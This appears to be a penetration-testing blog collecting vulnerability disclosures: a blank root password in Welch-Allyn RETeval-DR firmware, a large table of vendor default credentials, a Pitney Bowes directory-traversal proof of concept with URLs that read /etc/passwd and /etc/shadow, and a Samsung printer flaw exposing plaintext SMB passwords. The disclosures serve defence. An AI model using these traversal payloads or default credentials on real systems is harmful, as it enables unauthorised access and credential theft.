Vulnerability Disclosure

I recently had an appointment at an ophthalmologist and because it was in New Mexico, where appointments mean nothing and linear time isn’t a thing, I had a long wait in the exam room. Stay with me I swear we are going to pen test some stuff. Most of the equipment in the room was from Welch-Allyn so why not take a look at their stuff to see how secure my data would be.

I’m not an amazing reverse engineer; it is on my list of things to improve so I took this opportunity to dig into some firmware upgrades. I’ve looked through firmware in the past and decompiling binary files never got me any results.

I was able to find the firmware for the Welch-Allyn RETeval-DR, it isn’t sold in the United States but the file was available for download without authentication.

https://www.welchallyn.com/content/dam/welchallyn/documents/upload-docs/RETeval/reteval-2.5.0.fw

Welch Allyn RETeval-DR™ Firmware
Version 2.5.0 | November 11, 2015
System requirements: Windows XP, Windows 8 and all previous versions
File type: .fw | File size: 35.2 MB

I used the ‘file’ command to learn some things about the .fw file type.

root@kali:~/Desktop/RETeval-DR# file reteval-2.5.0.fw 
reteval-2.5.0.fw: Zip archive data, at least v2.0 to extract

Zip archive, I know what to do with those. At this point I assumed that this was going to be another binary fine and wasn’t super excited. Extracting the contents of the zip file reveals a bunch of .img files and an install.sh script.

.fw File Contents

.fw File Contents

My first thought was that the install.sh file might contain a login of some sort or some other sensitive data. The script contains some checksum validation and uses dd to write the images to disk. A very helpful piece of text is the offsets for each file are directly after the seek= .

dd offset values

dd offset values

I mounted the rootfs.img and poked around the file system.

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data# mount -t auto rootfs.img mnt/
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data# cd mnt
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt# ls
bin  boot  dev  etc  lib  lib32  linuxrc  lost+found  media  mnt  opt  proc  root  run  sbin  sys  tmp  usr  var

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cat passwd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
ftp:x:83:83:ftp:/home/ftp:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cd shadow
bash: cd: shadow: Not a directory

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cat shadow
root::10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
ftp:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::

Pretty sure this means that the root password is blank…OPSEC 101. Almost 90% of penetration testings is asking yourself ‘What would happen if I did this?’ So, What would happen if I wrote that to a new disk on a virtual machine?

VMWare Blank Drive

VMWare Blank Drive

 

/dev/sdb added

/dev/sdb added

We will need to install pv for the installation to work, pv monitors progress of data and as data gets piped to it directly after it is unzipped and before it gets to the dd command in the install script. Also, we need to make the script executable before we try to use it.

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# apt-get install pv
<Redacted the install text>
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# chmod +x install.sh 
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# ./install.sh --help
arguments:
  -a <archive name> (required)
  -b update boot loader too
  -d <destination> (required)
  -f fresh install (on PC)
  -n numeric progress
  -v print firmware version
examples:
  First time programming: -a firmware.fw -f -d /dev/sdc
  Firmware update: -a firmware.fw -d /dev/mmcblk0
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# ./install.sh -a ../reteval-2.5.0.fw -n -f -d /dev/sdb
<Redacted the install text>
/dev/sdb after dd

/dev/sdb after dd

I used fdisk /dev/sdb to set the bootable flag on partition 1 (/dev/sdb1).

fdisk Set Bootable

fdisk Set Bootable

I couldn’t get it to boot independently in a VM and I couldn’t get sdb3 or sdb4 to mount in my Kali Linux box. I tried to use the -t auto and it failed, I also tried every Linux type that I could with no luck. Oh, well. In a few minutes we found the default password for the device and determined if we could boot the drives up in VM. Not bad for an eye appointment.

Disclosure Notice: We contacted Welch-Allyn on May 17, 2017 and notified them of the issue. As of June 30th they had not given me any feedback about mitigation status so I am releasing this. Forty five days is more than enough time to mitigate this vulnerability.

In the course of all the penetration tests we have tracked down lots of default passwords. Default passwords are a quick win on most penetration tests but usually don’t get the respect of a good remote code execution. Just because it isn’t sexy doesn’t mean you don’t get access.

This isn’t by any means a complete list but we hope it helps. The table is fairly large so feel free to filter and search. There is a notes field hidden to the right that has some helpful stuff in it but unfortunately it doesn’t fit well.


Default Password List

List of Default Passwords for Penetration Tests.
Device TypeManufacturerModelUsernamePasswordNotes
ApplicationBrocadeSwitch Explorerrootfirbrannehttp://community.brocade.com/docs/DOC-1651
ApplicationBrocadeSwitch Exploreradminpassword
ApplicationFirebirdRDBMSSYSDBAmasterkey
ApplicationHPWebJet Adminadminadmin
ApplicationLantronixUDS1100Telnet
ApplicationSybaseSQLAnywheresa
ApplicationSymantecVPsymantecHash - VPUninstallPassword=S1084A085DC6BD2D755D4D6A7726
ApplicationWyseSQL AdminRapportThinMgmt
ApplicationWyseSQL AdminRapportThinMgmt451
ApplicationWyseFTPrapportr@p8p0r+
ApplicationWyseConsolerootwyse
ApplicationWyseConsoleroot
ApplicationWyseVNCVNCwinterm
ApplicationWyseVNCpassword
BIOSWyseBIOSFireport
InfrastructureAlcatel-LucentWebViewadminswitch
InfrastructureAPCAP9340apcapcadmin access
InfrastructureAPCAP9340deviceapcdevice only access
InfrastructureBlueSocketWireless LAN controlleradminblue
InfrastructureCiscoWireless LAN controlleradminadmin
InfrastructureDaktronicsGalaxyProDakpwdapplication password for FTP over non-standard port. Download software from Daktronics.com
InfrastructureDellPowerVault TL4000adminsecure
InfrastructureMitel3300 ICPsystempassword
InfrastructureMitel3300installer2000Telnet banner is SX-2000, only works for telnet access not web
InfrastructureNortelBusiness Secure RouternnadminPlsChgMe!
InfrastructurePolycomVBP 5300LF2root@#$%^&*!SSH - The password from support is @#$%^&*!() but DES ignores ()
MSSQLTrackit DatabaseInstance: TRACKITsaTI_DB_P@ssw0rdPort 64004
RemoteManagementDellDRACrootcalvin
RemoteManagementDellDRACuser1user1234user1:$1$nVOr80rB$HDAd6FRIG24k/WN4ZuYPC0:0:99999:7::: (not verified)
RemoteManagementHPiLO2adminadmin
WebApp3ComSuper StackmanagermanagerCIH 4400 44.70
WebApp3ComIntelliJack Switch NJ2000password
WebAppAdaptecStorage Managerraidraid
WebAppAlliance Storage TechnologiesUDO Archive Apllianceadminadminhttp://www.plasmontech.com/downloads2/pdf/aaequickstartguide_4_8xx.pdf
WebAppAxis540+/542+
WebAppBay NetworksBayStack 303/304manager
WebAppBoschDiBosAdministratorcase sensitive
WebAppCanonMF8050
WebAppCanoniR-ADV 403576543217654321
WebAppCarrierCNNWebsacarrier
WebAppCheck In SystemsCheck In Systemsmciadminhttp://www.medicalcheckin.com/Technical_Document_for_IT_Departments.pdf
WebAppCimetricBACnetadminadmin
WebAppCisco7936 Cisco IP Conference Stationadministrator**#
WebAppDellPowerVault 124Tadminpassword
WebAppDell2162DSAdmin
WebAppDellEquallogic PSgrpadmingrpadmin
WebAppDigiOneRealPortrootdbps
WebAppEatonPowerwareadminadmin
WebAppEMCNavispherenasadminpassword
WebAppHoneywellNetAXSadminadmin
WebAppHPSystem Management HomepageAdministatorAdministator
WebAppHPHPNASadministratorhpinvent
WebAppHPProcurveprocurvemodel 2501g
WebAppIBMAdvanced System Managementadminadmin
WebAppIBMAdvanced System Managementgeneralgeneral
WebAppIBMBaseboard Management controllerUSERIDPASSW0RDLook for BMC Login. Case sensitive and zero in password not 'oh'
WebAppInFocusLiteShow 3Admin Useradmin
WebAppInFocusLiteShow 3Basic Userbasic
WebAppIntelRemote Management Module 2adminpassword
WebAppIntelNetPort Expressrootworks on telnet or web
WebAppIntermeceasyLAN 100eIntermec
WebAppIntermeceasyLAN 10i2Intermec
WebAppJavaGlassfishadminadminadmin
WebAppKIPPrintNETkipkiptcpwrapped on port 80
WebAppKonica MinoltaPageScopeAdministator12345678bizhub C652
WebAppKyoceraCommand Center RXAdminAdmin
WebAppKyoceraCommand Centeradmin00
WebAppKyoceraHyPASAdminAdmin
WebAppLantronixUDS1100
WebAppLantronixXportadminPASS
WebAppLantronixXPORTlook for ltx_conf.htm
WebAppNEC (Digitcom)Univerge SV8100ADMIN10
WebAppNEC (Digitcom)Univerge SV8100necii47544
WebAppNEC (Digitcom)Univerge SV8100tech12345678
WebAppNEC (Digitcom)Univerge SV8100ADMIN29999
WebAppNEC (Digitcom)Univerge SV8100USER11111
WebAppNetgearGS108Tpassword
WebAppNetgearGS724tppassword
WebAppNetgearProSafenetgearnetgearruns on port 8080
WebAppNetgearGSM7328FSadmin
WebAppNortelBCMnnadminPlsChgMe!Look for BCM login as the prompt
WebAppOKIML590adminOkiLANcase sensitive
WebAppOKIC5200nrootLast 6 of MAC*Capitalize any letters
WebAppOTRSOTRSroot@localhostrootdoc.otrs.org/3.1/en/html/ - look for 'First Login'
WebAppPerleIOLANadminsuperuser
WebAppPolycomVBP 5300LF2rouserdefault
WebAppPrintekPrint Serveraccess
WebAppPrintSirWEBPORT 1.1admin
WebAppPrintSirWEBPORT 1.1adminsu@psir
WebAppPrintSirWEBPORT 1.1admin1234
WebAppRicohAficio SP C811DNadmin
WebAppRicohAficio MP C6000admin
WebAppRicohAficio 2022adminpassword
WebAppSamsungCLX-6250adminsec00000
WebAppSamsungSyncThru Webadminadmin
WebAppSharpMXadminadmin
WebAppSharpARadminSharp
WebAppSharpMX-M363Nadministratoradminhttp://www.lesolsoncompany.com/InstantKB20/KnowledgebaseArticle50144.aspx
WebAppSilexSX-500access
WebAppSpeco TechnologiesWeb Clientadmin1111
WebAppSpectraT50sulook for /gf/startpage.htm
WebAppSymantecEndpoint Protection Manageradminadminhttp://www.symantec.com/connect/forums/endpoint-protection-management-console-credentials-lost
WebAppTandbergRDX quikstationAdminAdmin!case sensitive
WebAppTeradiciPCoIP Zero ClientAdministrator
WebAppWebCTRLWebCTRLadminpassword
WebAppWebCTRLWebCTRLanonymous access
WebAppXeroxWorkCentre 7775admin1111
WebAppXioTechEmprise 5000administratoradministrator
WebAppZebraZebraNetadmin1234
WebAppZebraZTC GK420dadmin1234
WebAppEMC2Cloud Tiering Appliancerootrain
WebAppStratusEverrunadminadmin
WebAppIBMTS7700adminadmin
WebAppCrestonAirmediaadminadmin
WebAppQuantumScaler I40adminpassword
InfrastructureWelch-AllynRETevalrootRETeval-DR 2.5.0
WebAppSplunkSplunkadminchangemeport 8000

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and twitter we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was when we found out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb

About a year ago during a network penetration test I found an information disclosure vulnerability in a Samsung printer. The disclosure was fairly serious; NTLM hashes for any network accounts were stored in a CSV file. I’m not a web application penetration tester but luckily the connection was slow enough that I watched the page load briefly then redirect to the next page. This definitely highlights the importance of manually testing.

Because this has been responsibly disclosed and patched it isn’t technically an 0day.

The firmware fixing the vulnerability was released over six months ago and I didn’t want to publish any vulnerability information irresponsibly.  The following is the information submitted to Samsung and links to the updated firmware. Updating any Samsung printers is important. Equally important is adding printers and other peripheral devices to your patching program.


SyncThru Web SMB Password Disclosure

Known Vulnerable Versions
Samsung SCX-5835_5935 Series Printer
Main Firmware Version :  2.01.00.26
Network Firmware Version :  V4.01.05(SCX-5835/5935) 12-22-2008
Engine Firmware Version :  1.20.73
UI Firmware Version :  V1.03.01.55 07-13-2009
Finisher Firmware Version :  Not Installed
PCL5E Firmware Version : PCL5e 5.87 11-07-2008
PCL6 Firmware Version : PCL6 5.86 10-28-2008
PostScript Firmware Version : PS3 V1.93.06 12-19-2008
SPL Firmware Version : SPL 5.32 01-03-2008
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
Samsung SCX-5635 Series
Main Firmware Version :     2.01.01.18 12-08-2009
Network Firmware Version :     V4.01.16(SCX-5635) 12-04-2009
Engine Firmware Version :     1.31.32
PCL5E Firmware Version :    PCL5e 5.92 02-12-2009
PCL6 Firmware Version :    PCL6 5.93 03-21-2009
PostScript Firmware Version :    PS3 1.94.06 12-22-2008
TIFF Firmware Version :    TIFF 0.91.00 10-07-2008

Proof of Concept

  1. This procedure does not seem to work using Internet Explorer 7 but behaves as expected with Firefox 4.0.1.
  2. Using the default username and password (admin/admin), it is possible to obtain all credentials used for SMB file transfer. To obtain the file access     http://<printer url>/smb_serverList.csv
  3. The UserName and UserPassword fields are unencrypted and visible using any text editor.

Links to Updated Firmware
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX5635_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX5835_5935_V2.01.00.56_0401113_1.01.zip

Acknowledgements
Samsung security and I had a few miscommunications and I chose to hold off on releasing this until I knew that a patch was available. When I inquired again they immediately rectified the situation.

Contact security@samsung.com if you happen to find any additional vulnerabilities.